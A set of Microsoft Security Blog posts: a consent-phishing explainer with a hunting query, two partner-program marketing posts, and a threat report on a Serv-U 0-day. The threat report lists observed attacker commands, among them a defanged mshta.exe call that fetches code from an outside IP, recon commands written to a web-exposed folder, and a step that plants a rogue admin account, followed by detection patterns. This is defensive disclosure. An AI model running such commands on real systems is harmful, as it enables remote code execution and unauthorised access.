This blog offers a look into the current state of consent phishing emails as an initial attack vector and what security administrators can do to prevent, detect, and respond to these threats using advanced solutions like Microsoft Defender for Office 365. Consent phishing attacks aim to trick users into granting permissions to malicious cloud apps in order to gain access to user’s legitimate cloud services. The consent screen displays all permissions the app receives; and because the cloud services are legitimate, unsuspecting users accept the terms or hit ‘enter,’ which grants the malicious app those requested permissions.

Consent phishing attacks are a specialized form of phishing, so they require a comprehensive, multi-layer defense. It’s important for system administrators to gain visibility and control over apps and the permissions these apps have in their environment. User consent settings with consent policies in Azure Active Directory enable administrators to manage when end users can grant consent to apps. A new app governance add-on feature in Microsoft Cloud App Security provides organizations the visibility to enable them to quickly identify when an app exhibits anomalous behavior.

Microsoft has previously warned against these application-based attacks as many organizations shifted to remote work force at the onset of the COVID-19 pandemic. Microsoft’s Digital Crimes Unit (DCU) has in the past also taken steps to disrupt cybercriminal infrastructure used for a particular consent phishing campaign.

The state of consent phishing attacks

Consent phishing attacks abuse legitimate cloud service providers, including Microsoft, Google, and Facebook, that use OAuth 2.0 authorization—a widely used industry protocol that allows third-party apps to access a user’s account and perform actions on their behalf.

The goal of these attacks is to trick unsuspecting users into granting permissions (consent) to malicious attacker-owned applications. This is different from a typical credential harvesting attack, where an attacker looking to steal credentials would craft a convincing email, host a fake landing page, and expect users to fall for the lure. If the attempt is successful, user credentials are then passed on to the attacker.

In a consent phishing attack, the user sign-in takes place at a legitimate identity provider, rather than a fake sign-in page, in an attempt to trick users into granting permissions to malicious attacker-controlled applications. Attackers use the obtained access tokens to retrieve users’ account data from the API resource, without any further action by the user. Targeted users who grant the permissions allow attackers to make API calls on their behalf through the attacker-controlled app. Depending on the permissions granted, the access token can also be used to access other data, such as files, contacts, and other profile details.

Microsoft Defender for Office 365 data shows an increasing use of this technique in recent months.

Figure 1. OAuth phishing URL trend from October 2020

In most cases, consent phishing attacks do not involve password theft, as access tokens don’t require knowledge of the user’s password, yet attackers are still able to steal confidential data and other sensitive information. Attackers can then maintain persistence in the target organization and perform reconnaissance to further compromise the network.

A typical consent phishing attack follows this attack chain:

Figure 2. Consent phishing attack flow

Attackers typically configure apps so that they appear trustworthy, registering them using names like “Enable4Calc”, “SettingsEnabler”, or “Settings4Enabler,” which resemble legitimate business productivity app integrations. Attackers then distribute OAuth 2.0 URLs via conventional email-based phishing attacks, among other possible techniques.

Clicking the URL triggers an authentic consent prompt, asking users to grant the malicious app permissions. Other cloud providers, such as Google, Facebook, or Twitter, display consent prompts or dialog boxes that request for users’ permissions on behalf of third-party apps. The permissions requested vary depending on the app.

Figure 3. OAuth apps gain permission by displaying a “Permissions requested” dialog that shows what permissions the third-party is requesting

When users click “accept” or “allow”, the app obtains an authorization code that it redeems for an access token. This access token is then used to make API calls on behalf of the user, giving attackers access to the user’s email, forwarding rules, files, contacts, and other sensitive data and resources.

Consent phishing campaign: A case study

A recent consent phishing attack we tracked employed social engineering techniques to craft an email that impersonates a business growth solutions company. The message falsely claims to instruct users to review and sign a document, signaling a sense of urgency for the user—a tactic that is apparent in most phishing emails.

Figure 4. Sample email campaign with a Review Doc(s) & Sign link pointing to an OAuth URL

There are several phishing techniques in this email campaign: brand impersonation, personalized email text specific to the recipient or organization, and a recognizable sense of urgency as a social engineering lure.

What differentiates this attack from others is how the OAuth URL serves malicious content. To the email recipient, the “Review Doc(s) & Sign” OAuth URL appears legitimate, while URL is formatted with the identity provider URL as well.

The pattern we observed in this instance displays the the OAuth URL as “login.microsoftonline.com.” Other providers, such as Google, also format OAuth URLs in a similar manner.

Figure 5. Observed patterns in OAuth URLs pointing to attacker’s domain

Given the recent trend in OAuth abuse, we encourage organizations to look into and prevent this critical threat, beyond what traditional security measures offer.

How Microsoft delivers comprehensive, coordinated defense against consent phishing

The sophisticated and dynamic threat landscape exemplified by consent phishing attacks demonstrates the importance of employing a Zero Trust security model with a multi-layer defense architecture.

Microsoft 365 Defender provides comprehensive protection against consent phishing by coordinating defense across domains using multiple solutions: Microsoft Defender for Office 365, Microsoft Cloud App Security, and Azure Active Directory.

Prevent consent for illegitimate apps with Azure AD user consent settings

The Microsoft identity platform helps prevent consent phishing in a few ways.

With risk-based step-up consent, Azure Active Directory (Azure AD) blocks end users from being able to grant consent to apps that are considered potentially risky. For example, a newly-registered multi-tenant app that has not been publisher-verified might be considered risky, and end users would not be allowed to grant consent, even if they visit the OAuth phishing URL.

Azure AD puts admins in control over when users are allowed to grant consent to apps. This is a powerful mechanism for preventing the threat in the first place, and Microsoft recommends that organizations review settings for when users can grant consent. Microsoft recommends choosing the out-of-the-box option where users are only allowed to consent to apps from verified publishers, and only for chosen, lower risk permissions. For additional granularity, admins can also create custom consent policies, which dictate the conditions for allowing users to grant consent, including for specific apps, publishers, or permissions.

Blocking consent phishing emails with Microsoft Defender for Office 365

Microsoft Defender for Office 365 uses advanced filtering technologies backed by machine learning, IP and URL reputation systems, and unparalleled breadth of signals to provide durable protection against phishing and other malicious emails, helping to block consent phishing campaigns out of the gate. Anti-phishing policies in Defender for Office 365 help protect organizations against impersonation-based phishing attacks.

Microsoft researchers are constantly tracking OAuth 2.0 URL techniques and use this knowledge to provide feedback to email filtering systems. This helps ensure that Microsoft Defender for Office 365 is providing protection against the latest OAuth phishing attacks and other threats. Signals from Microsoft Defender Office 365 helps identify malicious apps and prevent users from accessing them, and provides rich threat data that organizations can query and investigate using advanced hunting capabilities.

Identifying malicious apps with Microsoft Cloud App Security

Microsoft Cloud App Security policies such as activity policies, anomaly detection, and OAuth app policies help organizations manage apps connected to their environment. The new app governance add-on feature to Microsoft Cloud App Security helps organizations:

  • Define appropriate Microsoft 365 app behavior with data, users, and other apps
  • Quickly detect unusual app behavior activity that varies from the baseline, and
  • Disable an app when it behaves differently than expected

Figure 6. App governance in Microsoft 365 Compliance

To give organizations and users confidence in using apps in the Microsoft 365 ecosystem, the Microsoft 365 App Compliance Program enables app developers to establish authenticity of their applications. The program includes publisher verification, publisher attestation, and Microsoft 365 certification.

Investigating and hunting for consent phishing attacks

Security operations teams can use advanced hunting capabilities in Microsoft 365 Defender to locate consent phishing emails and other threats. Microsoft 365 Defender consolidates and correlates email threat data from Microsoft Defender for Office 365, app signals from Microsoft Cloud App Security, and intelligence from other Microsoft services to provide a comprehensive end-to-end view of attacks. Security operations teams can then use the rich tools in Microsoft 365 Defender to investigate and remediate attacks.

OAuth URL pattern redirects to domain with unusual TLD

The consent phishing campaigns we described in this blog used a variety of unusual TLDs for communication with the attacker infrastructure. Use query below to find inbound emails with suspicious OAuth patterns. The suggested TLDs are based on our investigations. Security teams can modify the TLDs to expand the search. Run query in Microsoft 365 Defender.

let UnusualTlds = pack_array('.uno','.host','.site','.tech','.website','.space','.online');
EmailUrlInfo
| where Url startswith "https://login.windows.net/common/oauth2" or Url startswith "https://login.microsoftonline.com/consumers/oauth2"
| where Url has "redirect_uri"
| where Url has_any(UnusualTlds)
| join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId
| where EmailDirection == "Inbound"

Best practices for hardening organizations against consent phishing

In addition to taking full advantage of the tools available to them in Microsoft 365 and Microsoft Azure, administrators can further strengthen defenses against consent phishing by following these measures:

Additional resources

App governance add-on feature for Microsoft Cloud App Security is initially available as a public preview to existing Microsoft Cloud App Security Customers in North America and Europe with other regions being added gradually the next few months.

To get started with app governance, visit our quick start guide. To learn more about app governance, visit our documentation. To launch app governance portal in Microsoft 365 Compliance center, go to https://aka.ms/appgovernance.

Refer to our documentation for reference on configuring and managing user consent and app permissions in Azure AD. For more information on Microsoft Cloud App Security refer to our blog and Microsoft Cloud App Security explainer video.

The post Microsoft delivers comprehensive solution to battle rise in consent phishing emails appeared first on Microsoft Security Blog.

Categories: Microsoft

MISA expands portfolio and looks ahead during Microsoft Inspire

Microsoft Malware Protection Center - Wed, 07/14/2021 - 11:00am

This blog post is part of the Microsoft Intelligent Security Association (MISA) guest blog seriesLearn more about MISA.

Welcome to fiscal year 2022 (FY22) and my first official blog as the MISA Lead. It’s been a whirlwind couple of months getting up to speed with all things MISA—closing out FY21 while continuing to build on the great foundation my predecessor laid out as I strategize where to go from here. More to come on that, but first let’s take a moment to reflect and celebrate what MISA and our members have accomplished over the past year and take a sneak peek into what’s next.

MISA saw fantastic growth in FY21, having grown to more than 246 member companies, including 176 independent software vendors (ISVs) creating 259 integrations. We expanded to include managed security service providers (MSSPs) and now have 67 MSSP members providing 165 managed service offers. We also expanded the MISA product portfolio to include five new compliance products, increasing our footprint across more Microsoft technologies. And we’re excited to be bringing two more products into our portfolio, which we will discuss a little later in this blog. MISA’s growth is proof of the value we bring in helping customers better defend against increasingly sophisticated threats, and it demonstrates the value Microsoft Security sees in our partner community.

Have you seen the new look and feel of Microsoft Security? No? Yes? Well, be on the lookout—you’ll start to notice that MISA branding will be refreshed to align with the new look of Microsoft Security, emphasizing the strength of integrated solutions for a seamless user experience.

Exciting offer for MISA members

If you missed our last MISA office hours, MISA members can view the recording or the presentation available to the public. MISA members can request exam certification vouchers as part of their member benefits. Vouchers are only redeemable for Security, Compliance, and Identity (SCI) Fundamentals and Advanced Role Based (ARB) exams. MISA members can request vouchers per quarter, totaling four exam requests per Microsoft financial year.

MISA members, please email us for more information. Don’t miss the first quarter request deadline on July 20, 2021.

Bulletproof wins Microsoft Security Partner of the Year Award 2021

We are thrilled to announce that MISA member Bulletproof has been selected as the 2021 Security Partner of the Year. The Security Partner of the Year Award (POTYA) recognizes a partner who is doing an exceptional job of providing customers with end-to-end security solutions (versus one-point solutions) based on Microsoft Security, Compliance, and Identity capabilities in Microsoft 365 and Microsoft Azure Security. With only one Security category for Partner of the Year, Bulletproof rose to the top among a field of more than 160 entries.

Headquartered in Canada, Bulletproof is an award-winning Gold Microsoft Partner with 12 Gold competencies and was recently inducted to MISA. Additionally, Bulletproof has achieved Microsoft’s Advanced Specialization in Threat Protection. The company has offices across Canada, the US, Europe, the Middle East, and Africa (EMEA) with users on six continents who trust Bulletproof to secure their identities, networks, data, and devices.

Bulletproof does an exceptional job of fostering trust in a Zero Trust world by providing customers with end-to-end solutions based on Microsoft security and compliance capabilities in Microsoft 365 and Microsoft Azure. Their family of managed services includes Bulletproof 365 Enterprise (B365E), which combines Microsoft 365 Security, the strength of Azure Security, and Bulletproof’s security pedigree to provide a Zero Trust framework with two levels of all-day monitored security vigilance—proactive protection that stops threats before they happen and responsive security that automatically contains threats when they occur.

B365E enables customers to modernize and improve their security posture with cost-effective, seamless, and intelligent managed security and automated threat containment that doesn’t slow productivity. Bulletproof 365 Workplace integrates the power of Microsoft 365 cloud productivity solutions—wrapped with advanced cloud app security, unmatched employee education, and all-day IT support. The company’s latest addition, Bulletproof 365 Compliance, adds a managed information protection service to the company’s offerings.

A key differentiator for Bulletproof is their Microsoft SWAT Team, experts who meet with customers to directly handle questions about the technical details of proposed products and offerings, accelerating each customer’s journey to improved security. Tight alignment with Microsoft recently helped Bulletproof on a competitive win with a global real estate company looking for a best-of-breed solution.

“We’re still pinching ourselves to be perfectly honest,” said Chris Johnston, Bulletproof CEO. “Being recognized with the Security 2021 Microsoft Partner of the Year Award at the global level is an incredible honor that truly validates the significant impact Bulletproof’s end-to-end security solutions are having in driving value (and peace of mind) for Microsoft customers. Thank you, Microsoft, for your ongoing collaboration, inspiration and support, and this exciting and entirely humbling recognition. And to all the 2021 award winners, finalists, and partners at large who enabled and supported customers through the accelerated digital transformation we have seen this past year, we applaud you.”

Listen to the conversation with Chris Johnston, CEO of Bulletproof, and Phil Montgomery the new General Manager, Microsoft Security GTM.

Expanding the MISA product portfolio

We’re excited to share that we’ll be extending Azure Defender for IoT to include our managed security service providers (MSSPs). We’re also welcoming MSSPs supporting Microsoft Defender for Office 365.

Azure Defender for IoT to include MSSPs

Azure Defender for IoT provides agentless asset discovery, vulnerability management, and threat monitoring for IoT and Operation Technology (OT) environments, with flexible deployment options including fully on-premises, cloud-connected, or hybrid. It is tightly integrated with Azure Sentinel and supports third-party security operation center (SOC) tools including Splunk, IBM QRadar, and ServiceNow.

“Operational Technology is integral to many sectors and critical to those that support public services. By leveraging Defender for IoT and integrating it into the Microsoft Security ecosystem, we’re able to provide threat detection across the IT and OT boundaries without interrupting production systems. Bringing OT into the SOC allows work with our customers to protect their existing OT environments and help them embrace the cloud transformation, knowing that the services are secure and managed end-to-end. We are happy that Azure Defender for IoT has been extended to MSSPs in MISA, so we can gain product insights to extend solution capabilities of our managed services.”—Martin Riley, Director, Managed Security Services, Bridewell Consulting

Microsoft Defender for Office 365 to include MSSPs

Microsoft Defender for Office 365 provides integrated threat protection for all of Office 365, helping protect customers and their email and collaboration tools against advanced threats like business email compromise and credential phishing. MSSPs’ managed services for Microsoft Defender for Office 365 are now supported in MISA, streamlining the involvement of in-house security teams.

“Limited resources and rapidly evolving threats can create operational gaps for our clients. Optiv managed services provide outcome-based services across the security capabilities built into Microsoft 365 to protect vulnerable attack vectors. Incorporating Microsoft Defender for Office 365 in our solutions helps protect against email compromise, credential phishing, and more, so we can protect our clients’ businesses. We are pleased that Defender for Office 365 has joined the MISA family and look forward to increased visibility and co-marketing opportunities for our managed services.”—Justin Staffel, Director, Microsoft Alliance, Optiv Security, Inc.

Security, compliance, and identity at Microsoft Inspire

Microsoft Inspire kicks off today, and the security team will be there in full force. This year’s event will deliver a cross-cloud narrative embracing five themes:

  1. Microsoft cloud enables digital transformation across industries.
  2. Drive business growth with the most partner-focused business platform.
  3. Evolving Microsoft cloud for a new world of work.
  4. Innovate from cloud to edge on your terms.
  5. Build a foundation of trust and security.

Security, compliance, identity, and management will be a key focal point of the event highlighted in the “Build on a foundation of trust and security” theme. Throughout the two-day event, we’ll demonstrate how our partners can grow their business by offering comprehensive solutions and earn customers’ trust by partnering with the leading security company.

Security, compliance, identity, and management sessions:
  • One theme session.
  • Four breakout sessions airing separately in both US and EMEA time zones.
  • Eight “Ask the Experts” sessions are accompanied by a corresponding live Q&A session to be delivered immediately following.
  • Three on-demand sessions: Each will become available July 14, 2021, at 10 AM following the delivery of the Day one keynote and can be watched at any time during or after the event.

Check out Corporate Vice President (CVP) Vasu Jakkal’s security, compliance, and identity blog to find out more.

Be sure to visit the Microsoft Inspire website and bookmark the following sessions:

 

Session ID Session Title Speaker TS03-R1
Session 1   Session 2 Build on a foundation of trust and security Vasu JakkalCVP, Security, Compliance, and Identity
Rodney ClarkeCVP, Global Channel Sales
Lucas JoppaChief Environmental Officer
Jenny Lay-FlurrieChief Accessibility Officer BRK121
Session 1   Session 2 Modernize security and defend against threats Scott WoodgateSr. Director, Product Marketing BRK123
Session 1   Session 2 Accelerate customer transformation with cloud security solutions from Microsoft  Adwait (AJ) JoshiDirector, Product Marketing BRK124    Session 1   Session 2 Build your business by managing risk and securing customer information Alym RayaniGM SCI Compliance BRK122
Session 1   Session 2 Identity and endpoint management—a strong foundation for Zero Trust and profitability Irina NechaevaSr. Director, Product Marketing
Gideon BibliowiczDirector of Product Marketing OD122 Build a business around helping customers drive towards a Zero Trust framework Cedric DepaepeSecurity Architect/Partner Marketing Manager OD121 Building a business around providing modern security operating center services to customers Mandana JavaheriGlobal Director, SCI Business Development
Mayank KapurSr. Partner Marketing Manager OD123 Going to market with Microsoft. Learn how to maximize Microsoft’s channel investments this coming year Nomi NazeerSr. Partner Marketing Manager ATEBRK121-R1 Ask the Experts: Modernize security and defend against threats (R1) Carissa BroadbentProduct Marketing Manager
Jeff ChinIncubation Security Specialist
Cristhofer Romeo MuñozProgram Manager ATEBRK121   Ask the Experts: Modernize security and defend against threats Zvi Ben ShefferPrincipal PM Manager
Scott WoodgateSr. Director Product Marketing
Nomi NazeerSr. Partner Marketing Manager ATEBRK123-R1 Ask the Experts: Accelerate customer transformation with cloud security solutions from Microsoft (R1) Albert ChewSr. Product Marketing Manager
Tom JanetscheckSr. Program Manager, Azure Security Center CxE
Adam JungSr. Product Marketing Manager
Nomi NazeerSr. Partner Marketing Manager
John LewisProgram Manager ATEBRK123   Ask the Experts: Accelerate customer transformation with cloud security solutions from Microsoft Nathalia BittarSr. Product Marketing Manager Yuri DiogenesPrincipal Program Manager Adwait (AJ) JoshiDirector, Product Marketing
Caroline LeeProgram Manager
John LewisProgram Manager ATEBRK124-R1 Ask the Experts: Build your business by managing risk and securing customer information
Jim BanachArchitect
Shilpa BothraProduct Marketing Manager
Raman KalyanDirector, Product Marketing
Jenny LiProgram Manager
Nomi NazeerSr. Partner Marketing Manager
Eric OuelletSr. Product Marketing Manager
François Van HemertCompliance Architect/Partner ATEBRK124  Ask the Experts: Build your business by managing risk and securing customer information Shilpa BothraProduct Marketing Manager
Raman KalyanDirector, Product Marketing
Jenny LiProgram Manager
Nomi NazeerSr. Partner Marketing Manager
Eric OuelletSr. Product Marketing Manager ATEBRK122 Ask the Experts: Identity and endpoint management—a strong foundation for Zero Trust and profitability  Gideon BibliowiczDirector of Product
Cedric DepaepeSecurity Architect/Partner
Adam HarbourProduct marketing Manager
Irina NechaevaSr. Director, Product Marketing
Patrick PayetteSr. Partner Marketing Manager ATEBRK122-R1 Ask the Experts: Identity and endpoint management—a strong foundation for Zero Trust and profitability (R1) Harish AitharajuPrincipal Program Manager
Cedric DepaepeSecurity Architect/Partner
Adam HarbourProduct Marketing Manager
Gideon BibliowiczDirector of Product Marketing
Irina NechaevaSr. Director, Product Marketing
Patrick PayetteSr. Partner Marketing Manager Learn more

To learn more about MISA, watch this two-minute video or visit our website where you can find out more about the MISA program, product integrations, and locate MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post MISA expands portfolio and looks ahead during Microsoft Inspire appeared first on Microsoft Security Blog.

Categories: Microsoft

How Microsoft Security empowers partners to build customer trust

Microsoft Malware Protection Center - Wed, 07/14/2021 - 11:00am

As I reflect on my first year at Microsoft, it was both challenging and exceptional: from my remote onboarding in the middle of a pandemic to dramatic changes in the cyber landscape, to Microsoft’s critical role as a frontline responder in some of the most sophisticated cyberattacks in history and leading the security industry.

Our world is changing, and Microsoft Security is rising to the challenges of a new normal. I am thrilled and humbled by the milestones we achieved this past year. We surpassed $10 billion in security business revenue, representing more than 40 percent year-over-year growth, and were recognized as a leader in five Gartner Magic Quadrants and seven Forrester Waves. This not only demonstrates our commitment to providing best-in-class security solutions but also underscored the trust our customers have placed in Microsoft and our partners.

We believe in times of uncertainty, customer trust is more important than ever. Today, I want to share more about how we are empowering our partners to be successful in building trust with customers and enabling business growth.

Significant partner opportunity expansion

Our partner community plays an essential role in our own growth strategy, and we are dedicated to empowering your success. Recently, we commissioned Forrester Consulting to investigate the partner opportunity around Microsoft Security and found that for 2021, partners reported up to 130 percent increase in business year-over-year (YoY) when selling Microsoft Security solutions. We believe the significant growth in partner revenue opportunity speaks to the comprehensive Microsoft Security portfolio and what it can do to transform your business and help secure your customers. Learn more in the Forrester Total Economic Impact study.

In addition to product portfolio investments, we continue to make investments to help partners better capture new revenue streams. We have heard from our partners about the challenges in managing customers’ environments as the number of customers increases. Today, we are excited to announce Microsoft 365 Lighthouse Preview. Microsoft 365 Lighthouse is currently available as a public preview and provides managed service providers with one central location and standard security configuration templates to secure devices, data, and users for small and medium business customers using Microsoft Business Premium. Specifically, Microsoft 365 Lighthouse empowers partners to quickly identify and act on threats, anomalous sign-in, and device compliance alerts. Reducing management complexity as our partners scale and driving standardization across customers will allow partners to proactively manage risks and improve the security posture for the customers. Learn more about Microsoft 365 Lighthouse in today’s blog post and on the Microsoft 365 Lighthouse website.

Additionally, this year, we are making an unprecedented 400 percent increase in our partner program funding to help you succeed, including expansion of the Microsoft Intelligent Security Association (MISA) and more skilling resources such as security workshops, practice playbooks, and a new advanced specialization for security.

Zero Trust principles help to shape the journey

We believe Zero Trust is the cornerstone of effective security. The key principles behind a Zero Trust framework—verify explicitly, grant least privileged access, and assume breach—are relevant to every organization, even if your customers use a different framework for their security strategy. Partners who help their customers embrace Zero Trust can count on Microsoft to deliver solutions across six pillars: identity, endpoints, data, applications, network, and infrastructure.

Identity and endpoints

Identity and endpoints are the foundation for building a strong security posture and partners can play a critical role in helping customers ensure identities are verified and endpoints are healthy and protected before granting further access.

  • We are excited to extend the scope of protection of Microsoft Azure Active Directory B2C (Azure AD B2C) to include fraudulent activities by integrating Dynamics 365 Fraud Protection with Azure AD B2C. By combining the power of Azure AD Identity Protection and Dynamics Fraud Protection’s account protection capabilities, customers can help protect end customers from account abuse, thus protecting their own business. Read the blog Fraud trends part 4: balancing identity authentication with user experience to learn more.
  • The pandemic and growth in hybrid work means that an increasingly diverse portfolio of devices is in use by employees. We continue to expand Microsoft Defender for Endpoint’s unique capabilities to additional platforms to strengthen customers’ abilities to monitor and improve their security posture.
    • Recently, we announced that threat and vulnerability management capabilities are now generally available for Linux operating systems, in addition to existing support for macOS and Windows. Read the announcement.
    • We also made Microsoft Tunnel VPN support on Android devices generally available, enabling organizations to deliver both mobile threat defense and access to on-premises resources within a unified experience in a single security app. Read the announcement.
Data and applications

Data is one of the most important assets of any organization, and applications shape the way people interact with data. Partners can help customers govern application access based on users and the devices they are on as well as protect sensitive data both in transit and at rest.

  • The growing number of cloud apps makes it challenging to gain deeper insights across all apps. To help solve this problem, we have built the app governance add-on feature to Microsoft Cloud App Security, now available as a public preview today. App governance can be used to monitor, protect, and govern Microsoft 365 apps and quickly identify, alert, and prevent risky app behaviors. Learn more in the recent app governance blog post.
  • A comprehensive security approach is not just about defending against external attacks but also about addressing insider risks. Previously, we introduced the capability to identify risk activities for users with critical positions. Today, we are extending the priority user group capability in Insider Risk Management to include fine-grained role-based access control (RBAC), now available as a public preview. It adds permissions to priority user groups to further limit alerts and cases to specific individuals instead of the whole group. Learn more in today’s insider risk blog post.
  • Compliance Manager simplifies compliance and helps reduces risks by enabling organizations to assess, monitor, and improve their compliance posture for their Microsoft 365 data. Today, we are releasing universal regulatory assessment templates for non-Microsoft clouds, such as Salesforce and SAP in Compliance Manager. There are more than 300 templates available now for managing customers’ compliance posture across different clouds and apps. Learn more in today’s Compliance Manager blog post.
Network and infrastructure

Within network and infrastructure, cloud security is the number one planned priority for investment for chief information security officers (CISOs) in the next 12 months. Earlier this week we announced the intention to acquire RiskIQ, a leader in global threat intelligence and attack surface management, to further accelerate cloud security. RiskIQ helps customers discover and assess the security of their entire enterprise attack surface—in Microsoft Cloud, AWS and other clouds, on-premises, and from their supply chain. Learn more from our announcement blog.

Earlier this year, we announced the general availability of multi-cloud support for both Azure Security Center and Azure Defender, further enabling partners to support customers’ multi-cloud digital transformation strategy and simplify the tools needed to manage multi-cloud. Azure Security Center and Azure Defender enable partners to strengthen a customer’s cloud security posture and provide extended detection and response across their hybrid cloud workloads. Read the blog Protecting multi-cloud environments with Azure Security Center to learn more.

Holistic protection

With the acceleration of digital transformation and the increase in volume and sophistication of threats, customers are increasingly looking for better solutions to protect themselves and their ecosystem. Microsoft is the only security company to deliver both cloud-native SIEM (Azure Sentinel) and integrated XDR (Microsoft Defender). Our partners around the world have responded by building managed detection and response offerings using these tools. Only SIEM and XDR together deliver true end-to-end visibility with clear prioritization. Earlier this year, we went further with incident sharing between our SIEM and XDR to deliver a significant productivity benefit over legacy tools. At RSA Conference 2021, we introduced new customizable anomaly rules based on machine learning for Azure Sentinel and more third-party connectors to take us to over 150 new connectors this year alone. We also announced the public preview of Azure Sentinel solutions, including an SAP threat monitoring solution. The release of solutions makes it easier than ever for customers to immediately benefit from integrations with our technology partners and provides discoverability through the new solutions blade in the Azure Sentinel interface. Learn more about how partners can leverage Azure Sentinel solutions in today’s blog post.

Closing the security skills gap

Customers rely on partners’ security expertise and skills to secure their digital transformation. With the increasing security demand from customers, the shortfall in security professionals means partners’ ability to develop and retain talent will become a competitive advantage. We strive to ensure partners have the skilling and training resources needed to be successful. I hope you had a chance to explore the four new security, compliance, and identity certifications we announced in May 2021. In addition, I would also like to encourage you to explore the Microsoft Security Technical Content Library, a one-stop-shop offering Microsoft Security learning paths, interactive guides, and video resources to build and grow your skills. Use it to access content that best suits your needs today.

Enabling digital sovereignty

Data is the lifeblood of any organization, and it is growing exponentially as more organizations take a cloud-first posture. Our customers are now challenged to properly contextualize their data and make the best use of it. We want to empower our partners to help customers build sovereignty over their data to further enhance customer trust. At Microsoft, we are committed to building solutions that help customers to extract maximum insights so their data can be their competitive advantage.

Our mission, together

We often say that security is a team sport, and Microsoft has never been more committed to working with our partners to protect customers and create a more secure world for all.

I am grateful to be on this journey with you, our partner community, and I am inspired by the work you do every day. Through this mission, we have the power to shape the world in positive and profound ways, with customer trust at the heart of everything we do.

Together, we can build technologies that enable a more inclusive, equitable, and sustainable world. I encourage you to tune in to our Inspire 2021 sessions to learn more about partner opportunities and how we can collectively create a safer and better future for all. Learn more from our Microsoft Partner blog.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How Microsoft Security empowers partners to build customer trust appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit

Microsoft Malware Protection Center - Tue, 07/13/2021 - 6:30pm

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

The vulnerability being exploited is CVE-2021-35211, which was recently patched by SolarWinds. The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U’s implementation of the Secure Shell (SSH) protocol. If Serv-U’s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.

Microsoft 365 Defender has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker’s follow-on malicious actions. Microsoft Threat Experts customers who were affected were notified of attacker activity and were aided in responding to the attack.

Microsoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.

Who is DEV-0322?

MSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a “development group” or “DEV group” and assigns each DEV group a unique number (DEV-####) for tracking purposes.

MSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.

Attack details

MSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from Serv-U.exe include:

  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.

Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.

By reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.

To protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a targeted attack notification, which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.

Detection guidance

Customers should review the Serv-U DebugSocketLog.txt log file for exception messages like the line below. A C0000005; CSUSSHSocket::ProcessReceive exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

Additional signs of potential compromise include:

  • Recent creation of .txt files in the Client\Common\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.
  • Serv-U.exe spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for:
    • mshta.exe
    • powershell.exe
    • cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line:
      • whoami
      • dir
      • ./Client/Common
      • .\Client\Common
      • type [a file path] > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\[file name].Archive”
    • Any process with any of the following in the command line:
      • C:\Windows\Temp\
  • The addition of any unrecognized global users to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users, which appears to store the Global users information.

Detection details Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

